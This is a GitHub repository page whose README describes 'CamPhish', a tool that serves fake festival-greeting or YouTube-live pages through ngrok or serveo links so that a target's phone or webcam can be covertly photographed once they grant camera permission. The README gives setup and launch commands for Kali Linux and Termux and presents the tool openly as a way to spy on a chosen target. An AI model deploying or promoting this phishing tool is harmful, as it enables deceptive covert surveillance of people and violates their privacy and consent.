https://github.com/ferozomer/camshot
https://github.com/ferozomer/camshot
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/ferozomer/camshot
- Owner: ferozomer
- License: gpl-3.0
- Created: 2020-05-10T21:45:44.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2020-05-10T21:51:16.000Z (about 5 years ago)
- Last Synced: 2025-02-02T06:15:18.699Z (4 months ago)
- Language: HTML
- Size: 7.19 MB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CamPhish
Grab cam shots from target's phone front camera or PC webcam just sending a link.
# What is CamPhish?
CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device
## Features
In this tool I added two automatic webpage templates for engaged target on webpage to get more picture of cam
- Festival Wishing
- Live YouTube TV
simply enter festival name or youtube's video ID
## This Tool Tested On :
- Kali Linux
- Termux
- MacOS
- Ubuntu
# Installing and requirements
This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal
```
apt-get -y install php openssh git wget
```
## Installing (Kali Linux/Termux):
```
git clone https://github.com/ferozomer/CamShot.git
cd CamShot
bash camshot.sh
```